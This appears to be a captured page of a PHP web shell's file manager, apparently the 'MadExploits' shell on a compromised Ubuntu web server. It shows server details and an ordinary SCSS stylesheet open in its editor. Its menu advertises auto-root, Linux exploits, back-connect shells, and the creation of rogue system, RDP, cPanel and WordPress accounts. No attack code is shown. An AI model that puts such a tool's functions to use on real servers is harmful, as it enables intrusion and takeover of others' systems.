Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
stylesheets /
sass /
base /
[ HOME SHELL ]
Name
Size
Permission
Action
_bootstrap_extend.scss
6.67
KB
-rwxr-x--x
_content_with_menu.scss
4.86
KB
-rwxr-x--x
_elements.scss
5.81
KB
-rwxr-x--x
_form.scss
12.49
KB
-rwxr-x--x
_header.scss
2.51
KB
-rwxr-x--x
_helpers.scss
6.32
KB
-rwxr-x--x
_menu.scss
3.32
KB
-rwxr-x--x
_nanoscroll.scss
2.04
KB
-rwxr-x--x
_page_header.scss
2.98
KB
-rwxr-x--x
_sidebar_left.scss
4.45
KB
-rwxr-x--x
_sidebar_left_sizing.scss
9.28
KB
-rwxr-x--x
_sidebar_right.scss
1.1
KB
-rwxr-x--x
_skeleton.scss
19.67
KB
-rwxr-x--x
_toolbar.scss
2.15
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _nanoscroll.scss
// NANO SCROLLER // ----------------------------------------------------------------------------- /* Nano Scroller Plugin */ html.no-overflowscrolling { .nano { height: 100%; position: relative; overflow: hidden; width: 100%; > .nano-content { bottom: 0; left: 0; position: absolute; overflow: hidden; right: 0; top: 0; &:focus { outline: none; } &::-webkit-scrollbar { display: none; visibility: hidden; } } &.has-scrollbar { > .nano-content::-webkit-scrollbar { display: block; visibility: visible; } } > .nano-pane { bottom: 0; position: absolute; opacity: .01; right: 0; top: 0; visibility: hidden\9; /* Target only IE7 and IE8 with this hack */ width: 4px; -webkit-transition: .2s; -moz-transition: .2s; -o-transition: .2s; transition: .2s; > .nano-slider { background: $color-primary; margin: 0; position: relative; visibility: hidden; } } &:hover > .nano-pane, .nano-pane.active, .nano-pane.flashed { opacity: 0.99; } &:hover { > .nano-pane { > .nano-slider { visibility: visible; } } } } &.custom-scroll { .nano { > .nano-content { overflow: scroll; overflow-x: hidden; } } } } @media only screen and (max-width: 767px) { html.no-overflowscrolling { .nano { > .nano-content { overflow: scroll !important; overflow-x: hidden !important; } } } } @media only screen and (min-width: 768px) { html.overflowscrolling.fixed { .sidebar-left, .sidebar-right, .inner-menu { .nano { height: 100%; overflow: hidden; -webkit-overflow-scrolling: touch; > .nano-pane { > .nano-slider { visibility: visible; } } } } &.custom-scroll { .sidebar-left, .sidebar-right, .inner-menu { .nano { > .nano-content { overflow-y: scroll; overflow-x: hidden; } } } } } }
Close